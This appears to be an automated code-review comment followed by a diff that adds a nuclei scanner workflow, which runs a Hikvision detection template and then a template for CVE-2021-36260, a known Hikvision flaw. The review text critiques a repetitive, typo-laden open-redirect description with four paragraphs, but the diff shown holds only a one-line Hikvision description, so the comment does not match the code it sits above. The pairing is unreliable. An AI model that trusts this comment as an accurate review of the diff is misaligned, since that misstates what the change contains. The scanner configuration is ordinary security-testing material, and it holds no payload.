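Review bot: The added `description` repeats the same open-redirect explanation across four paragraphs, contains the typo "HTTPparameter" (should be "HTTP parameter"), and its third paragraph is ungrammatical ("Visiting unreal web page user's computer becomes affected by malware ..."). Keeping only the first and last paragraphs — which already state the affected plugin, the cause (unsanitized user-supplied input used in a redirect) and the phishing impact — would bring it in line with the one-line descriptions added elsewhere in this commit. Since the value is a `|` block scalar it also keeps a trailing newline; `description: |-` avoids that.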
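--- /dev/null
+++ b/PATH_NOT_SHOWN
@@ -0,0 +1,12 @@
+id: hikvision-workflow
+
+info:
+  name: Hikvision Security Checks
+  author: pdteam
+  description: A simple workflow that runs all Hikvision related nuclei templates on a given target.
+
+workflows:
+
+  - template: technologies/hikvision-detection.yaml
+    subtemplates:
+      - template: cves/2021/CVE-2021-36260.yaml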